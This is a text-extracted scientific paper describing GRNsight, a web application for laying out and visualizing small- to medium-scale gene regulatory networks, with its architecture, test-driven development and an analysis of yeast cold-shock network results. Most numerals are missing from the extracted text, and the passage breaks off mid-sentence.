e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks kam d. dahlquist , john david n. dionisio , ben g. fitzpatrick , nicole a. anguiano , anindita varshneya , britain j. southwick and mihir samdarshi department of biology, loyola marymount university, los angeles, california, united states department of electrical engineering and computer science, loyola marymount university, los angeles, california, united states department of mathematics, loyola marymount university, los angeles, california, united states abstract grnsight is a web application and service for visualizing models of gene regulatory networks (grns). a gene regulatory network (grn) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mrna and protein from genes. the original motivation came from our efforts to perform parameter estimation and forward simulation of the dynamics of a differential equations model of a small grn with nodes and edges. we wanted a quick and easy way to visualize the weight parameters from the model which represent the direction and magnitude of the influence of a transcription factor on its target gene, so we created grnsight. grnsight automatically lays out either an unweighted or weighted network graph based on an excel spreadsheet containing an adjacency matrix where regulators are named in the columns and target genes in the rows, a simple interaction format (sif) text file, or a graphml xml file. when a user uploads an input file specifying an unweighted network, grnsight automatically lays out the graph using black lines and pointed arrowheads. for a weighted network, grnsight uses pointed and blunt arrowheads, and colors the edges and adjusts their thicknesses based on the sign (positive for activation or negative for repression) and magnitude of the weight parameter. grnsight is written in javascript, with diagrams facilitated by d .js, a data visualization library. node.js and the express framework handle server-side functions. grnsight’s diagrams are based on d .js’s force graph layout algorithm, which was then extensively customized to support the specific needs of grns. nodes are rectangular and support gene labels of up to characters. the edges are arcs, which become straight lines when the nodes are close together. self-regulatory edges are indicated by a loop. when a user mouses over an edge, the numerical value of the weight parameter is displayed. visualizations can be modified by sliders that adjust the force graph layout parameters and through manual node dragging. grnsight is best-suited for visualizing networks of fewer than nodes and edges, although it accepts networks of up to nodes or edges. grnsight has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. grnsight serves as an example of following and teaching best practices for scientific computing and complying with fair principles, using an open and test-driven development model how to cite this article dahlquist et al. ( ), grnsight: a web application and service for visualizing models of small- to medium-scale gene regulatory networks. peerj comput. sci. :e ; doi . /peerj-cs. submitted may accepted august published september corresponding author kam d. dahlquist, kdahlquist@lmu.edu academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright dahlquist et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kdahlquist@�lmu.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ with rigorous documentation of requirements and issues on github. an exhaustive unit testing framework using mocha and the chai assertion library consists of around automated unit tests that examine nearly test files to ensure that the program is running as expected. the grnsight application (http://dondi.github.io/ grnsight/) and code (https://github.com/dondi/grnsight) are available under the open source bsd license. subjects bioinformatics, graphics, software engineering keywords gene regulatory networks, visualization, web application, web service, automatic graph layout, best practices for scientific computing, fair principles, open source, open development introduction grnsight is a web application and service for visualizing models of small- to medium- scale gene regulatory networks (grns). a gene regulatory network (grn) consists of genes, transcription factors, and the regulatory connections between them which govern the level of expression of mrna and protein from genes. our group has developed a matlab program to perform parameter estimation and forward simulation of the dynamics of an ordinary differential equations model of a medium-scale grn with nodes and edges (dahlquist et al., ; http://kdahlquist.github.io/grnmap/). grnmap accepts a microsoft excel workbook as input, with multiple worksheets specifying the different types of data needed to run the model. for compactness, the grn itself is specified by a worksheet that contains an adjacency matrix where regulators are named in the columns and target genes in the rows. each cell in the matrix contains a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them. the grnmap program then outputs the estimated weight parameters in a new worksheet containing an adjacency matrix where the “ ’s” are replaced with a real number that is the weight parameter, representing the direction (positive for activation or negative for repression) and magnitude of the influence of the transcription factor on its target gene (dahlquist et al., ). although matlab has graph layout capabilities, we wanted a way for novice and experienced biologists alike to quickly and easily view the unweighted and weighted network graphs corresponding to the matrix without having to create or modify matlab code. given that our user base included students in courses using university computer labs where the installation and maintenance of software is subject to logistical considerations sometimes beyond our control, we enumerated the following requirements for a potential visualization tool. the tool should: . exist as a web application without the need to download and install specialized software; . be simple and intuitive to use; . accept an input file in microsoft excel format (.xlsx); . read a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows; dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dondi.github.io/grnsight/ http://dondi.github.io/grnsight/ https://github.com/dondi/grnsight http://kdahlquist.github.io/grnmap/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . automatically lay out and display small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists and adds value to the interpretation of the modeling results. having established the broad technical requirements to which we were seeking a solution, the first task was to determine if software already existed that could fulfill our needs. a review by pavlopoulos et al. ( ), describes the types, trends, and usage of visualization tools available for genomics and systems biology. their list of tools for network analysis is representative of what was available to us at our project inception in january (given the caveat that the list itself is a moving target with some tools dropping out, new ones being added, and others evolving in their functions). with such a large number of tools available, it would be reasonable to expect that one already existed that could fulfill our needs. however, our use case was narrow, and the tools we investigated out of this diverse set each had properties that limited their use for us. with regard to our first requirement, out of the tools, are stand-alone applications, requiring installation, versus web applications. with respect to our second requirement, the more complex software packages out of the set have a steep learning curve. our third and fourth requirements specify data types. some packages were hardcoded for a different type of network than a grn (e.g., metabolic or signaling pathways, protein-protein interaction networks) or retrieved data exclusively from a backend database, not allowing user-supplied data. none at the time would readily accept an adjacency matrix with the grnmap specifications as input without some manipulation of the data format. finally, with respect to the last requirement, the core functionality, some packages were designed for visualization and analysis of much larger networks than the ones in which we were interested or did not have the ability to display directed, weighted graphs. as an illustration of this, pavlopoulos et al. ( ) showed that the open source software, cytoscape (shannon et al., ; smoot et al., ) had the highest citation count in the scopus database, as it is widely recognized as the “best-in-class” tool for viewing and analyzing large networks for systems biology research. however, while cytoscape is flexible in terms of what types of network representations it accepts as input (sif, nnf, gml, xgmml, sbml, biopax, psi-mi, graphml, cf. http:// manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported- network-file-formats), its basic “unformatted table files” format expects the network to be represented in a list of pairwise interactions between two nodes instead of as an adjacency matrix, requiring a grnmap user to convert the file external to the program. furthermore, cytoscape must be installed on a user’s computer. finally, because it is powerful and has a lot of features, there is a somewhat steep learning curve before a novice user can begin to visualize networks. multiple settings must be learned and selected to generate a display that properly fits a use case; it is not possible to just “load into cytoscape and go.” another open source application, gephi (bastian, heymann & jacomy, ), is a general graph visualization tool that does accept an adjacency matrix in .csv format (among a wide range of supported formats, dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#supported-network-file-formats http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cf. https://gephi.org/users/supported-graph-formats/csv-format/), but again requires download and installation of the software and has a complex feature set. because grnmap itself is complex software targeted both at experienced biology investigators and novice undergraduate users in a biomathematical modeling course, we wanted to limit the need to install and learn additional visualization software. reducing the cognitive load required for using the software would allow users to focus their attention on understanding the biological results of the model. after this exploration, we decided to create our own software solution that we could exactly tailor to our specifications. following the philosophy of “do one thing well” (http://onethingwell.org/post/ /about-one-thing-well), we wanted to prioritize rendering small- to medium-scale grns both easily and well. it was more important for us to create a tool that is specifically tailored to the visualization of these sized grns, and not every possible graph from every possible application domain. similarly, we wanted to pass data seamlessly from grnmap to grnsight, while bearing in mind that we should adopt practices that would also make our tool useful to users outside our own group. finally, we wanted to minimize any startup, onboarding, or overhead time, which necessitated also enumerating a set of process requirements that would lead us to our goal. our project should: � follow best practices for open software development in bioinformatics, including: reusing code, releasing early and often to a public repository, tracking requirements, issues, and bugs, performing unit-tests, and providing both code and user documentation (schultheiss, ; prli�c & procter, ; wilson et al., ); � leverage the expertise of the faculty and undergraduate student development team members and be responsive to our grnmap customers (i.e., eat our own dog food); � balance the needs of fulfilling our own use case with developing a tool of wider applicability to the scientific community during a development cycle that ebbs and flows with the pressures of the academic calendar. grnsight both fulfills our stated product requirements and serves as a model for best practices for software development in bioinformatics as discussed in the sections below. materials and methods input data grnsight automatically lays out the network graph specified by an adjacency matrix contained within a worksheet named “network” or “network_optimized_weights” in a microsoft excel workbook (.xlsx). it was designed to accept workbooks seamlessly from the matlab grn modeling program, grnmap; however, the expected input format is general and is not dependent on grnmap. detailed documentation for the expected input file format is found on the grnsight documentation page: http://dondi.github.io/ grnsight/documentation.html. grnsight can automatically lay out either an unweighted or weighted network graph specified by an adjacency matrix where regulators are named in the columns and target dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://gephi.org/users/supported-graph-formats/csv-format/ http://onethingwell.org/post/ /about-one-thing-well http://dondi.github.io/grnsight/documentation.html http://dondi.github.io/grnsight/documentation.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ genes in the rows. note that regulators (regulatory transcription factors) are themselves encoded by genes and will be referred to as such. the adjacency matrix can be either symmetric (with the exact same genes named in both the columns and rows) or asymmetric (additional genes in either the columns or rows or both). for an unweighted network, each cell in the matrix should contain a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them (fig. ). in a weighted network, the “ ’s” are replaced with a real number that is the weight parameter (fig. ). positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. after having implemented the core functionality of seamlessly reading grnmap- generated excel workbooks, we recently extended the ability of grnsight to read other commonly used network data formats to increase the interoperability of grnsight with other network analysis and visualization software. grnsight can import and display simple interaction format (sif, .sif, http://manual.cytoscape.org/en/latest/ supported_network_file_formats.html#sif-format) and graphml (.graphml; brandes et al., ; http://graphml.graphdrawing.org/) files and export network data in those two formats (see the grnsight documentation page for details of the implementation at http://dondi.github.io/grnsight/documentation.html). grnsight is designed to visualize small- to medium-scale grns, not the entire grn for an organism. the bounding box for display of the graph has a fixed size. currently, it is recommended that the user upload networks with no more than unique genes (nodes) or edges. a warning is given upon upload of a network with – nodes or – edges, although the network graph will still display. if the user attempts to upload a network of or more nodes or or more edges, the graph does not display, and an error message will be returned. architecture grnsight has a service-oriented architecture, consisting of separate server and web client components (fig. ). the server provides a web application programming interface (api) that accepts a microsoft excel workbook (.xlsx) file via a postrequest and converts it into a corresponding javascript object notation (json) representation. conversion is accomplished by first parsing the .xlsx file using the node-xlsx library (https://github. com/mgcrea/node-xlsx) then mapping the translated worksheet cells into json. it also provides demonstration graphs already in this json format, without requiring a spreadsheet upload. the web client provides a graphical user interface for visualizing the json graphs returned by the server, whether the graphs are parsed from uploaded excel workbooks or returned directly by the server’s demos. as an additional layer of customization, the graphical interface provided by the web client can be embedded in any web page using the standard iframe element. this is the mechanism used in deploying the production and beta versions of the software on http://dondi.github.io/grnsight. figure illustrates this architecture and the interactions of the components. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://manual.cytoscape.org/en/latest/supported_network_file_formats.html#sif-format http://graphml.graphdrawing.org/ http://dondi.github.io/grnsight/documentation.html https://github.com/mgcrea/node-xlsx https://github.com/mgcrea/node-xlsx http://dondi.github.io/grnsight http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ documentation for how grnsight is specifically deployed, including autonomous production and beta versions, can be found on the grnsight wiki (https://github.com/ dondi/grnsight/wiki/server-setup). figure screenshot of the expected format for an adjacency matrix for an unweighted network. regulators are named in the columns and target genes in the rows. a gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. the cells in the matrix contain a “ ” if there is no regulatory relationship between the regulator and target, or a “ ” if there is a regulatory relationship between them. this screenshot was generated from one of the demonstration files provided in the grnsight user interface, demo # : unweighted grn ( genes, edges), first discussed in dahlquist et al. ( ). figure screenshot of the expected format for an adjacency matrix for a weighted network. regulators are named in the columns and target genes in the rows. a gene name at the top of the matrix will be considered the same as a gene name on the side if it contains the same text string, regardless of capitalization. the cells in the matrix contain a “ ” if there is no regulatory relationship between the regulator and target. if there is a relationship, the weight parameter is provided as a real number. positive weights indicate activation of the target gene by the regulator, and negative weights indicate repression of the target gene by the regulator. this screenshot was generated from one of the demonstration files provided in the grnsight user interface, demo # : weighted grn ( genes, edges; schade et al., data), and displays weight parameters output by the grnmap modeling software, first discussed in dahlquist et al. ( ). dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight/wiki/server-setup https://github.com/dondi/grnsight/wiki/server-setup http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grnsight is an open source project and is itself built using other open source software. server-side components are implemented with node.js and the express framework (brown, ). graph visualization is facilitated by the data-driven documents javascript library (d .js; bostock, ogievetsky & heer, ). d .js provides data mapping and layout routines which grnsight heavily customizes in order to achieve the desired graph visualization. the resulting graph is a scalable vector graphics (svg) drawing in which d .js maps gene objects from the json representation provided by the web api server onto labeled rectangles. edge weights are mapped into bezier curves. the resulting graph is interactive, initially using d .js’s force graph layout algorithm to automatically determine the positions of the gene rectangles. the user can then drag the rectangles to improve the graph’s layout. customizations to the graph display are described further in the next section. as noted in the introduction, we decided to create our own grnsight software instead of utilizing prior existing network visualization packages, like cytoscape (shannon et al., ; smoot et al., ). however, in keeping with open source development practices, we did leverage other pre-existing code as described above. besides d .js, cytoscape.js (franz et al., ) has been developed as an open source network visualization engine. the biojs registry (yachdav et al., ) also lists a dozen components tagged with the keyword “network.” the choice of d .js as the visualization engine was made simply to leverage the expertise of one of the co-authors who was already familiar with the d .js library in order to minimize the startup, onboarding, and overhead time for the project, which initially served as a semester-long capstone experience for one of the undergraduate co-authors. graph customizations grnsight’s diagrams are based on d .js’s force graph layout algorithm (bostock, ogievetsky & heer, ), which was then extensively customized to support the specific needs of biologists grnsight web api server grnsight web application server embedded graphical user interface web browser host web page gui resources graph in json format excel, sif, graphml open/import cycle export cycle sif, graphml graph in json format figure grnsight architecture and component interactions. the server provides a web api that accepts files in microsoft excel workbook (.xlsx), sif (.sif), and graphml (.graphml) formats and converts them into a unified json representation. a converse import function accepts this json representation and converts it into either sif (.sif) or graphml (.graphml) formats. the web appli- cation server provides code and resources for the graphical user interface that displays this json representation of the graph. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for grn visualization. d .js’s baseline force graph implementation had round, unlabeled nodes and undirected, straight-line edges. the following customizations were made for the nodes: (a) the nodes were made rectangular; (b) a label of up to characters was added; (c) node size was varied, depending on the size of the label. customizations were also made for the edges. instead of undirected, straight line segments, the edges display as directed edges. they are implemented as bezier curves that straighten when nodes are close together and curve when nodes are far apart. a special case was added to form a looping edge if a node regulated itself. when an unweighted adjacency matrix is uploaded, all edges are displayed as black with pointed arrowheads. when a weighted adjacency matrix is uploaded, edges are further customized based on the sign and magnitude of the weight parameter. as is common practice in biological pathway diagrams (gostner et al., ), activation (for positive weights) is represented by pointed arrowheads, and repression (for negative weights) is represented by a blunt end marker, i.e., a line segment perpendicular to the edge. the thickness of the edge also varies based on the magnitude of the absolute value of the weight. larger magnitudes have thicker edges and smaller magnitudes have thinner edges. the way that grnsight determines the edge thickness is as follows: grnsight divides all weight values by the absolute value of the maximum weight in the adjacency matrix to normalize all the values to between zero and one. grnsight then adjusts the thickness of the lines to vary continuously from the minimum thickness (for normalized weights near zero) to maximum thickness (normalized weight of one). the color of the edge also imparts information about the regulatory relationship. edges with positive normalized weight values from . to are colored magenta; edges with negative normalized weight values from - . to - are colored cyan. edges with normalized weight values between - . and . are colored grey to emphasize that their normalized magnitude is near zero and that they have a weak influence on the target gene. when a user mouses over an edge, the numerical value of the weight parameter is displayed. when the user drags nodes to customize his or her view of the network, edges adapt their anchor points to the movements of the nodes. user interface the grnsight user interface includes a menu/status bar and sliders that adjust d .js’s force graph layout parameters. figure provides an annotated screenshot of the user interface, highlighting its primary features. users can move force graph parameter sliders to refine the automated visualization. nodes have a charge, which repels or attracts other nodes. the charge distance determines at what range a node’s charge will affect other nodes. the link distance determines the minimum distance maintained between nodes. gravity determines the strength of the force drawing the nodes to the center of the graph. sliders can be locked to prevent changes and also reset to default values. graph visualizations can also be modified through manual node dragging. design decisions for the user interface were driven by applicable interaction design guidelines and principles (nielsen, ; shneiderman et al., ; norman, ) in alignment with the mental model and expectations of the target user base, consisting primarily of biologists, both novice and experienced. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ test-driven development grnsight follows an open development model with rigorous documentation of requirements and issues on github. we have implemented an exhaustive unit testing framework using mocha (https://mochajs.org) and the chai assertion library (http:// chaijs.com) to perform test-driven development where unit tests are written before new functionality is coded (martin, ). this framework consists of around automated unit tests that examine nearly test files to ensure that the program is running as expected. table shows the test suite’s coverage report, as generated by istanbul (https:// gotwarlost.github.io/istanbul/). error and warning messages have a three-part framework that informs the user what happened, the source of the problem, and possible solutions. this structure follows the alert elements recommended by user interface guideline documents such as the os x human interface guidelines (https://developer.apple.com/library/mac/documentation/ userexperience/conceptual/osxhiguidelines/windowalerts.html). for example, grnsight returns an error when the spreadsheet is formatted incorrectly or the maximum number of nodes or edges is exceeded. the file menu includes commands for uploading an adjacency matrix in microsoft excel (.xlsx) and other formats. the demo menu lists four grns that have been preloaded into the server. the status display shows the and edge counts. force graph parameters can be adjusted, locked, or reset using this panel. some commands are also available in the format menu. figure annotated screenshot of the grnsight user interface. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://mochajs.org http://chaijs.com http://chaijs.com https://gotwarlost.github.io/istanbul/ https://gotwarlost.github.io/istanbul/ https://developer.apple.com/library/mac/documentation/userexperience/conceptual/osxhiguidelines/windowalerts.html https://developer.apple.com/library/mac/documentation/userexperience/conceptual/osxhiguidelines/windowalerts.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ availability grnsight (currently version . . ) is available at http://dondi.github.io/grnsight/ and is compatible with google chrome version . . . or higher and mozilla firefox version . . or higher on the windows and mac os x operating systems. the website is free and open to all users, and there is no login requirement. website content is available under the creative commons attribution non-commercial share alike . unported license. grnsight code is available under the open source bsd license from our github repository https://github.com/dondi/grnsight. every user’s submitted data are private and not viewable by anyone other than the user. uploaded data reside as temporary files and are deleted from the grnsight server during standard operating system file cleanup procedures. a google analytics page view counter was implemented on september , and a file upload counter was added on april . from these start dates and as of august , the grnsight home page has been accessed , times, and , files have been uploaded and viewed with grnsight. of these , files, an estimated were uploaded by users outside of our group. results and discussion we have successfully implemented grnsight, a web application and service for visualizing small- to medium-scale grns, fulfilling our five requirements: . it exists as a web application without the need to download and install specialized software; . it is simple and intuitive to use; . it accepts an input file in microsoft excel format (.xlsx), as well as sif (.sif) and graphml (.graphml); . it reads a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows (excel format only); . it automatically lays out and displays small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists, adding value to the interpretation of the modeling results. grnsight facilitates interpretation of grn model results grnsight facilitates the biological interpretation of unweighted and weighted grn graphs. our discussion focuses on two of the demonstration files provided in the table grnsight test suite code coverage summary. denominators represent the number of aspects of each type detected by istanbul in the grnsight codebase; numerators represent the subset of these which were executed by unit test code. aspect of the code test coverage (percent) statements / ( . %) branches / ( . %) functions / ( . %) lines / ( . %) dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dondi.github.io/grnsight/ https://github.com/dondi/grnsight http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ user interface, demo # : unweighted grn ( genes, edges) and demo # : weighted grn ( genes, edges; schade et al., data). these two files describe grns from budding yeast, saccharomyces cerevisiae, correspond to supplementary data published by dahlquist et al. ( ), and when displayed by grnsight, represent interactive versions of figs. and of that paper, respectively. figure gives a side-by-side view of the same adjacency matrices laid out by grnsight and by hand. figures a– c are derived from demo # : unweighted grn ( genes, edges), and figs. d– f are derived from demo # : weighted grn ( genes, edges; schade et al., data). figures a and d show examples of the automatic layout performed by grnsight. figures c and f show the same adjacency matrices laid out by hand in adobe illustrator, corresponding to figs. and of dahlquist et al. ( ), respectively. figures b and e started with the automatic layout from grnsight and then were manually manipulated from within grnsight to lay them out similarly to msn rox fhl gts rph abf mac cup phd msn rap aft reb hsf hal nrg yap cin skn yap ace w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w w msn gts - . - . - . - . - . . - . - . - . . . - . - . . . - . . - . . . - . . - . . - . . - . - . - . - . . cup phd reb hal nrg yap cin skn yap ace abf mac msn rap rox aft fhl hsf rph cin cup fhl gts hsf msn msn nrg rap aft reb rox rph yap yap abf ace hal mac phd skn cin cup fhl gts hsf msn msn nrg rap aft reb rox rph yap yap abf ace hal mac phd skn cin cup fhl gts hsf msn msn nrg rap aft reb rox rph yap yap abf ace hal mac phd skn cin cup fhl gts hsf msn msn nrg rap aft reb rox rph yap yap abf ace hal mac phd skn a b c d e f figure side-by-side comparison of the same adjacency matrices laid out by grnsight and by hand. (a) grnsight automatic layout of the demonstration file, demo # : unweighted grn ( genes, edges); (b) graph from (a) manually manipulated from within grnsight; (c) the same adjacency matrix from (a) and (b) laid out entirely by hand in adobe illustrator, corresponding to fig. of dahlquist et al. ( ); (d) grnsight automatic layout of the demonstration file, demo # : weighted grn ( genes, edges; schade et al., data); (e) graph from (d) manually manipulated from within grnsight; (f) the same adjacency matrix from (d) and (e) laid out entirely by hand in adobe illustrator, corresponding to fig. of dahlquist et al. ( ). the nodes in (f) are colored in the style of genmapp (salomonis et al., ), based on the time course of expression of that gene in the schade et al. ( ) microarray data (stripes from left to right, , , and minutes of cold shock, with magenta representing a significant increase in expression relative to the control at time , cyan representing a significant decrease in expression relative to the control, and grey representing no significant change in expression relative to the control). dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figs. c and f, respectively. the use of grnsight represents a substantial time savings compared to creating the same figures entirely by hand and allows the user to try multiple arrangements of the nodes quickly and easily. note that this type of “by hand” manipulation of graphs is most useful for small- to medium-scale networks, the kind that grnsight is designed to display, and would not be appropriate for large networks. viewing the unweighted network (figs. a– c) allows one to make observations about the network structure (dahlquist et al., ). for example, yap has the highest in-degree, being regulated by six other transcription factors. rap has the highest out- degree of five, regulating four other transcription factors and itself. four genes, aft , nrg , rap , and yap , regulate themselves. many of the transcription factors are involved in regulatory chains, with the longest including five nodes originating at skn or ace . there are several other four-node chains that originate at cin , mac , phd , skn , and yap . finally, there are two rather complex feedforward motifs involving cin , rox , and yap and skn , yap , and rox (dahlquist et al., ). the networks with colored edges (figs. d– f) display the results of a mathematical model, where the expression levels of the individual transcription factors were modeled using mass balance ordinary differential equations with a sigmoidal production function and linear degradation (dahlquist et al., ). each equation in the model included a production rate, a degradation rate, weights that denote the magnitude and type of influence of the connected transcription factors (activation or repression), and a threshold of expression. the differential equation model was fit to published yeast cold shock microarray data from schade et al. ( ) using a penalized nonlinear least squares approach. the visualization produced by grnsight is displaying the results of the optimized weight parameters. positive weights > represent an activation relationship and are shown by pointed arrowheads. one example is that cin activates the expression of msn . negative weights < represent a repression relationship and are shown by a blunt arrowhead. one example is that abf represses the expression of msn . the thicknesses of the edges also vary based on the magnitude of the absolute value of the weight, with larger magnitudes having thicker edges and smaller magnitudes having thinner edges. in figs. d– f, the edge corresponding to the repression of the expression of msn by abf stands out as the thickest because the absolute value of its weight parameter (- . ) has the largest magnitude out of all the weights (dahlquist et al., ). it is noticeable that none of the edges that represent activation are as thick as the abf -to- msn edge; only rap -to-rph and hal -to-msn are close with weights of . and . , respectively. the color of the edge also imparts information about the regulatory relationship. edges with positive normalized weight values from . to are colored magenta ( edges in this example); edges with negative normalized weight values from - . to - are colored cyan ( edges in this example). edges with normalized weight values between - . and . are colored grey to indicate that their normalized magnitude is near zero and that they have a weak influence on the target gene (five edges in this example). the grey color de-emphasizes the weak relationships to the eye, thus emphasizing the stronger colored relationships. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ because of this visualization of the weight parameters, one can make some interesting observations about the behavior of the network (dahlquist et al., ). taking the arrowhead type, thickness, and color into consideration, one can, by visual inspection, group edges by type and relative influence into four activation and four repression bins. rap -to-rph , hal -to-msn , and nrg to itself have the strongest activation relationships, followed by rap -to-msn and cin -to-msn , followed by nrg -to-yap , msn -to-fhl , skn -to-rox and phd -to-msn , followed by abf -to-fhl as the weakest of the activation relationships. the aforementioned abf -to-msn edge has the strongest repression relationship, followed by ace -to-yap , rap -to-hsf , cin -to-rox , aft to itself, and rap to itself, followed by rox -to-yap , phd -to-cup , cin -to-yap , yap -to-rox , yap -to-rox , skn -to-yap , rap -to-aft , and yap to itself, followed by mac -to-cup and skn -to-nrg as the weakest of the repression relationships. these rankings could have been obtained, of course, by sorting the numerical values of the edges in a table, but it is notable that these groupings can also be picked out by eye and then put into the context of the other network connections. because the five weakest connections, cup -to-yap , reb -to-gts , yap -to-cin , yap -to-yap , and hsf -to-reb , colored grey, are de-emphasized in the visual display, a different interpretation of the network structure can be made as compared to the unweighted network (figs. e and f vs. figs. b and c). in most cases, nodes in a regulatory chain “drop out” visually “breaking” the chain. for example, in the four-node chain beginning with rap -to-hsf , the last two nodes, reb and gts , are only weakly connected. in the five-node chains beginning with skn -to-yap or ace -to-yap , and the four-node chains beginning with mac -to-cup or phd -to-cup , the nodes connected to yap drop out (yap -to-yap , yap -to-cin , and cup -to-yap ). this suggests that regulatory chains may only be effective to a depth of two levels, and that while longer chains are theoretically possible, given the network connections, they have a negligible effect on the dynamics of expression of downstream genes. another interpretation of the network structure that is highlighted by the weighted display is that the -gene network can be divided into two smaller subnetworks by removing the two edges cup -to-yap (grey) and abf -to-fhl (thin magenta, weakly activating). while this could also be observed in the unweighted network, the application of the weight information, showing only thin connections between the two subnetworks, suggests that they could function relatively independently. finally, the unweighted display showed two complex feedforward motifs involving cin , rox , and yap and skn , yap , and rox . the weighted display reveals that the complexity of the connections is reduced because the weak yap -to-yap and yap -to-cin edges drop out. furthermore, the display shows that the modeling predicts that the three- node cin -rox -yap motif is an incoherent type feedforward loop, while the skn - yap -rox motif is a coherent type feedforward loop, neither of which is found very commonly in escherichia coli nor s. cerevisiae grns (alon, ). the modeling combined with the display suggests that further investigation is warranted: either these two rare types of feedforward loops are important to the dynamics of this particular grn, dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ or the network structure is incorrect. in either case, future lines of experimental investigation are suggested to the user. when examining individual genes in the network, one can see that the expression of several genes is controlled by a balance of activation and repression by different regulators. for example, the expression of msn is strongly activated by cin , but even more strongly repressed by abf . the expression of rox is weakly activated by skn and weakly repressed by yap , cin , and yap . the expression of yap is weakly activated by nrg , but weakly repressed by itself, cin , and rox . furthermore, some transcription factors act both as activators of some targets and repressors of other targets. for example, rap activates the expression of msn and rph , but represses the expression of aft , hsf , and itself. phd , abf , cin , and skn also both activate and repress their different target genes in the network. for each of these regulators, there is experimental evidence to support their opposite effects on gene expression, although not necessarily for these particular target genes (rap : shore & nasmyth, ; phd : borneman et al., , abf : buchman & kornberg, and miyake et al., ; cin and skn : ni et al., ). except for cin , what these genes have in common is that they themselves have no inputs in the network. the remaining no-input genes (ace , mac , and hal ) have only one outgoing edge in this network. because these genes have no inputs and, in some sense, have been artificially disconnected from the larger grn of the cell, one must not overinterpret the results of the modeling for these genes. thus, grnsight enables one to interpret the weight parameters more easily than one could from the adjacency matrix alone. visual inspection has long been 